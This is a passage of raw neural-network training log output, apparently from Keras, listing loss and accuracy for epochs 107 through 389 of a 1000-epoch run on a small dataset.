5ms/step - loss: 0.9224 - accuracy: 0.6400\nEpoch 107/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9192 - accuracy: 0.6600\nEpoch 108/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9135 - accuracy: 0.6800\nEpoch 109/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9066 - accuracy: 0.6600\nEpoch 110/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8941 - accuracy: 0.6400\nEpoch 111/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8944 - accuracy: 0.6600\nEpoch 112/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8819 - accuracy: 0.6200\nEpoch 113/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8878 - accuracy: 0.6400\nEpoch 114/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9046 - accuracy: 0.6800\nEpoch 115/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8952 - accuracy: 0.6600\nEpoch 116/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8926 - accuracy: 0.6600\nEpoch 117/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9030 - accuracy: 0.6600\nEpoch 118/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9088 - accuracy: 0.6400\nEpoch 119/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9018 - accuracy: 0.6400\nEpoch 120/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9260 - accuracy: 0.6200\nEpoch 121/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9424 - accuracy: 0.5800\nEpoch 122/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9588 - accuracy: 0.6400\nEpoch 123/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9040 - accuracy: 0.6000\nEpoch 124/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8853 - accuracy: 0.6400\nEpoch 125/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8712 - accuracy: 0.6800\nEpoch 126/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8698 - accuracy: 0.6400\nEpoch 127/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8716 - accuracy: 0.6600\nEpoch 128/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8688 - accuracy: 0.6600\nEpoch 129/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8725 - accuracy: 0.6600\nEpoch 130/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8671 - accuracy: 0.6400\nEpoch 131/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8961 - accuracy: 0.6600\nEpoch 132/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8869 - accuracy: 0.6400\nEpoch 133/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8791 - accuracy: 0.6800\nEpoch 134/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8618 - accuracy: 0.6800\nEpoch 135/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8591 - accuracy: 0.6600\nEpoch 136/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8688 - accuracy: 0.6800\nEpoch 137/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8813 - accuracy: 0.6400\nEpoch 138/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8685 - accuracy: 0.6800\nEpoch 139/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8770 - accuracy: 0.6600\nEpoch 140/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8575 - accuracy: 0.6600\nEpoch 141/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8517 - accuracy: 0.7000\nEpoch 142/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8529 - accuracy: 0.6600\nEpoch 143/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8554 - accuracy: 0.6800\nEpoch 144/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8637 - accuracy: 0.6200\nEpoch 145/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8809 - accuracy: 0.6600\nEpoch 146/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9155 - accuracy: 0.6200\nEpoch 147/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8548 - accuracy: 0.6800\nEpoch 148/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8697 - accuracy: 0.6600\nEpoch 149/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8506 - accuracy: 0.6600\nEpoch 150/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8526 - accuracy: 0.6600\nEpoch 151/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9138 - accuracy: 0.6200\nEpoch 152/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8921 - accuracy: 0.6200\nEpoch 153/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8820 - accuracy: 0.6400\nEpoch 154/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8937 - accuracy: 0.6000\nEpoch 155/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9477 - accuracy: 0.6200\nEpoch 156/1000\n10/10 [==============================] - 0s 5ms/step - loss: 1.0597 - accuracy: 0.5000\nEpoch 157/1000\n10/10 [==============================] - 0s 6ms/step - loss: 1.0448 - accuracy: 0.6200\nEpoch 158/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.9371 - accuracy: 0.6000\nEpoch 159/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.9181 - accuracy: 0.6600\nEpoch 160/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8831 - accuracy: 0.6400\nEpoch 161/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8505 - accuracy: 0.6800\nEpoch 162/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8535 - accuracy: 0.6600\nEpoch 163/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8435 - accuracy: 0.6800\nEpoch 164/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8553 - accuracy: 0.6600\nEpoch 165/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8422 - accuracy: 0.7000\nEpoch 166/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8234 - accuracy: 0.6600\nEpoch 167/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8353 - accuracy: 0.6200\nEpoch 168/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8364 - accuracy: 0.6400\nEpoch 169/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8283 - accuracy: 0.6800\nEpoch 170/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8443 - accuracy: 0.6800\nEpoch 171/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8171 - accuracy: 0.7000\nEpoch 172/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8254 - accuracy: 0.6800\nEpoch 173/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8286 - accuracy: 0.6600\nEpoch 174/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8269 - accuracy: 0.6400\nEpoch 175/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8215 - accuracy: 0.6600\nEpoch 176/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8468 - accuracy: 0.6800\nEpoch 177/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8431 - accuracy: 0.6600\nEpoch 178/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8222 - accuracy: 0.6600\nEpoch 179/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8219 - accuracy: 0.6400\nEpoch 180/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8196 - accuracy: 0.6800\nEpoch 181/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8053 - accuracy: 0.7000\nEpoch 182/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8283 - accuracy: 0.6800\nEpoch 183/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8157 - accuracy: 0.6800\nEpoch 184/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8090 - accuracy: 0.7000\nEpoch 185/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8086 - accuracy: 0.6800\nEpoch 186/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8081 - accuracy: 0.6800\nEpoch 187/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8010 - accuracy: 0.6400\nEpoch 188/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8309 - accuracy: 0.6600\nEpoch 189/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8214 - accuracy: 0.6800\nEpoch 190/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8292 - accuracy: 0.6800\nEpoch 191/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8243 - accuracy: 0.7000\nEpoch 192/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8118 - accuracy: 0.6800\nEpoch 193/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8080 - accuracy: 0.6400\nEpoch 194/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7990 - accuracy: 0.6800\nEpoch 195/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8075 - accuracy: 0.6800\nEpoch 196/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8159 - accuracy: 0.6800\nEpoch 197/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8058 - accuracy: 0.6800\nEpoch 198/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8140 - accuracy: 0.6800\nEpoch 199/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8020 - accuracy: 0.6200\nEpoch 200/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8109 - accuracy: 0.6600\nEpoch 201/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7833 - accuracy: 0.6800\nEpoch 202/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8158 - accuracy: 0.6600\nEpoch 203/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8066 - accuracy: 0.6800\nEpoch 204/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7956 - accuracy: 0.6600\nEpoch 205/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8159 - accuracy: 0.6800\nEpoch 206/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7863 - accuracy: 0.7000\nEpoch 207/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8123 - accuracy: 0.6800\nEpoch 208/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8018 - accuracy: 0.6800\nEpoch 209/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8178 - accuracy: 0.6400\nEpoch 210/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.8198 - accuracy: 0.6600\nEpoch 211/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8036 - accuracy: 0.6800\nEpoch 212/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7890 - accuracy: 0.6600\nEpoch 213/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7841 - accuracy: 0.7000\nEpoch 214/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8063 - accuracy: 0.6600\nEpoch 215/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7913 - accuracy: 0.6800\nEpoch 216/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.8033 - accuracy: 0.6800\nEpoch 217/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7803 - accuracy: 0.7000\nEpoch 218/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7843 - accuracy: 0.6600\nEpoch 219/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7690 - accuracy: 0.7000\nEpoch 220/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7751 - accuracy: 0.6800\nEpoch 221/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7791 - accuracy: 0.7000\nEpoch 222/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8186 - accuracy: 0.6200\nEpoch 223/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8084 - accuracy: 0.7000\nEpoch 224/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7902 - accuracy: 0.6600\nEpoch 225/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7915 - accuracy: 0.6800\nEpoch 226/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7757 - accuracy: 0.7000\nEpoch 227/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7866 - accuracy: 0.7000\nEpoch 228/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7918 - accuracy: 0.6800\nEpoch 229/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7782 - accuracy: 0.6800\nEpoch 230/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7667 - accuracy: 0.7000\nEpoch 231/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7656 - accuracy: 0.6800\nEpoch 232/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7775 - accuracy: 0.7000\nEpoch 233/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7669 - accuracy: 0.6800\nEpoch 234/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7658 - accuracy: 0.7000\nEpoch 235/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7672 - accuracy: 0.7000\nEpoch 236/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7599 - accuracy: 0.6800\nEpoch 237/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7943 - accuracy: 0.7000\nEpoch 238/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7959 - accuracy: 0.6800\nEpoch 239/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7576 - accuracy: 0.7000\nEpoch 240/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7609 - accuracy: 0.6800\nEpoch 241/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7557 - accuracy: 0.7000\nEpoch 242/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7743 - accuracy: 0.6800\nEpoch 243/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7697 - accuracy: 0.7000\nEpoch 244/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7527 - accuracy: 0.7000\nEpoch 245/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7474 - accuracy: 0.6800\nEpoch 246/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7504 - accuracy: 0.7000\nEpoch 247/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.8038 - accuracy: 0.6200\nEpoch 248/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7760 - accuracy: 0.6800\nEpoch 249/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7562 - accuracy: 0.6800\nEpoch 250/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7367 - accuracy: 0.7000\nEpoch 251/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7404 - accuracy: 0.7000\nEpoch 252/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7471 - accuracy: 0.7000\nEpoch 253/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7454 - accuracy: 0.7000\nEpoch 254/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7420 - accuracy: 0.6800\nEpoch 255/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7454 - accuracy: 0.6600\nEpoch 256/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7578 - accuracy: 0.6800\nEpoch 257/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7651 - accuracy: 0.6600\nEpoch 258/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7703 - accuracy: 0.6600\nEpoch 259/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7609 - accuracy: 0.6400\nEpoch 260/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7765 - accuracy: 0.6800\nEpoch 261/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7685 - accuracy: 0.6200\nEpoch 262/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7638 - accuracy: 0.7000\nEpoch 263/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7632 - accuracy: 0.7000\nEpoch 264/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7738 - accuracy: 0.6600\nEpoch 265/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7457 - accuracy: 0.7000\nEpoch 266/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7644 - accuracy: 0.6800\nEpoch 267/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7585 - accuracy: 0.6800\nEpoch 268/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7620 - accuracy: 0.6800\nEpoch 269/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7464 - accuracy: 0.7000\nEpoch 270/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7444 - accuracy: 0.6800\nEpoch 271/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7315 - accuracy: 0.6800\nEpoch 272/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7390 - accuracy: 0.6800\nEpoch 273/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7222 - accuracy: 0.6800\nEpoch 274/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7323 - accuracy: 0.7000\nEpoch 275/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7345 - accuracy: 0.7000\nEpoch 276/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7493 - accuracy: 0.6800\nEpoch 277/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7320 - accuracy: 0.6800\nEpoch 278/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7372 - accuracy: 0.6800\nEpoch 279/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7289 - accuracy: 0.6600\nEpoch 280/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7457 - accuracy: 0.6800\nEpoch 281/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7642 - accuracy: 0.6600\nEpoch 282/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7616 - accuracy: 0.6600\nEpoch 283/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7458 - accuracy: 0.6400\nEpoch 284/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7229 - accuracy: 0.6400\nEpoch 285/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7258 - accuracy: 0.6800\nEpoch 286/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7210 - accuracy: 0.7000\nEpoch 287/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7182 - accuracy: 0.7000\nEpoch 288/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7241 - accuracy: 0.7000\nEpoch 289/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7209 - accuracy: 0.7200\nEpoch 290/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7340 - accuracy: 0.6800\nEpoch 291/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7395 - accuracy: 0.7000\nEpoch 292/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7297 - accuracy: 0.7200\nEpoch 293/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7186 - accuracy: 0.7000\nEpoch 294/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7221 - accuracy: 0.6800\nEpoch 295/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7439 - accuracy: 0.7200\nEpoch 296/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7260 - accuracy: 0.7000\nEpoch 297/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7104 - accuracy: 0.6800\nEpoch 298/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7036 - accuracy: 0.6800\nEpoch 299/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7110 - accuracy: 0.6800\nEpoch 300/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7061 - accuracy: 0.6800\nEpoch 301/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7031 - accuracy: 0.7000\nEpoch 302/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7185 - accuracy: 0.7000\nEpoch 303/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7124 - accuracy: 0.7000\nEpoch 304/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7066 - accuracy: 0.7000\nEpoch 305/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7162 - accuracy: 0.6600\nEpoch 306/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7094 - accuracy: 0.6800\nEpoch 307/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7098 - accuracy: 0.7000\nEpoch 308/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7254 - accuracy: 0.7000\nEpoch 309/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6981 - accuracy: 0.6800\nEpoch 310/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.7105 - accuracy: 0.7200\nEpoch 311/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.7199 - accuracy: 0.6800\nEpoch 312/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7253 - accuracy: 0.7000\nEpoch 313/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7035 - accuracy: 0.7000\nEpoch 314/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7003 - accuracy: 0.6200\nEpoch 315/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7006 - accuracy: 0.7000\nEpoch 316/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7140 - accuracy: 0.7200\nEpoch 317/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7010 - accuracy: 0.7000\nEpoch 318/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6835 - accuracy: 0.6800\nEpoch 319/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6993 - accuracy: 0.7000\nEpoch 320/1000\n10/10 [==============================] - 0s 4ms/step - loss: 0.7144 - accuracy: 0.6800\nEpoch 321/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7159 - accuracy: 0.7200\nEpoch 322/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7218 - accuracy: 0.6800\nEpoch 323/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6991 - accuracy: 0.7000\nEpoch 324/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7013 - accuracy: 0.6800\nEpoch 325/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7005 - accuracy: 0.7200\nEpoch 326/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7097 - accuracy: 0.7000\nEpoch 327/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6824 - accuracy: 0.7000\nEpoch 328/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6969 - accuracy: 0.7000\nEpoch 329/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7062 - accuracy: 0.6800\nEpoch 330/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6909 - accuracy: 0.7000\nEpoch 331/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6952 - accuracy: 0.7000\nEpoch 332/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7195 - accuracy: 0.6600\nEpoch 333/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6881 - accuracy: 0.6800\nEpoch 334/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6965 - accuracy: 0.6600\nEpoch 335/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6879 - accuracy: 0.7200\nEpoch 336/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6951 - accuracy: 0.6800\nEpoch 337/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6823 - accuracy: 0.7000\nEpoch 338/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6772 - accuracy: 0.7200\nEpoch 339/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6922 - accuracy: 0.7000\nEpoch 340/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6851 - accuracy: 0.6800\nEpoch 341/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7301 - accuracy: 0.7000\nEpoch 342/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7045 - accuracy: 0.6400\nEpoch 343/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6840 - accuracy: 0.7200\nEpoch 344/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.6994 - accuracy: 0.6800\nEpoch 345/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6833 - accuracy: 0.7200\nEpoch 346/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6804 - accuracy: 0.7000\nEpoch 347/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6819 - accuracy: 0.7000\nEpoch 348/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6964 - accuracy: 0.6800\nEpoch 349/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6979 - accuracy: 0.7000\nEpoch 350/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6938 - accuracy: 0.7200\nEpoch 351/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7131 - accuracy: 0.7000\nEpoch 352/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6709 - accuracy: 0.6800\nEpoch 353/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6902 - accuracy: 0.6600\nEpoch 354/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.7094 - accuracy: 0.6400\nEpoch 355/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.7081 - accuracy: 0.7000\nEpoch 356/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6767 - accuracy: 0.6800\nEpoch 357/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6777 - accuracy: 0.7200\nEpoch 358/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6758 - accuracy: 0.6800\nEpoch 359/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6587 - accuracy: 0.7200\nEpoch 360/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6772 - accuracy: 0.7000\nEpoch 361/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6927 - accuracy: 0.6800\nEpoch 362/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6601 - accuracy: 0.7000\nEpoch 363/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6578 - accuracy: 0.7200\nEpoch 364/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6662 - accuracy: 0.7200\nEpoch 365/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6887 - accuracy: 0.6800\nEpoch 366/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6650 - accuracy: 0.6800\nEpoch 367/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6783 - accuracy: 0.7200\nEpoch 368/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6534 - accuracy: 0.7000\nEpoch 369/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6575 - accuracy: 0.7000\nEpoch 370/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6502 - accuracy: 0.7400\nEpoch 371/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6664 - accuracy: 0.7200\nEpoch 372/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6579 - accuracy: 0.7200\nEpoch 373/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6631 - accuracy: 0.7000\nEpoch 374/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6596 - accuracy: 0.7400\nEpoch 375/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6641 - accuracy: 0.7200\nEpoch 376/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6622 - accuracy: 0.7000\nEpoch 377/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6746 - accuracy: 0.6600\nEpoch 378/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6592 - accuracy: 0.6800\nEpoch 379/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6495 - accuracy: 0.7800\nEpoch 380/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6818 - accuracy: 0.6800\nEpoch 381/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6814 - accuracy: 0.6800\nEpoch 382/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6495 - accuracy: 0.7200\nEpoch 383/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6603 - accuracy: 0.7200\nEpoch 384/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6364 - accuracy: 0.7200\nEpoch 385/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6541 - accuracy: 0.7200\nEpoch 386/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6581 - accuracy: 0.7200\nEpoch 387/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.6519 - accuracy: 0.7200\nEpoch 388/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.6510 - accuracy: 0.7200\nEpoch 389/1000\n10/10 [==============================] - 0s 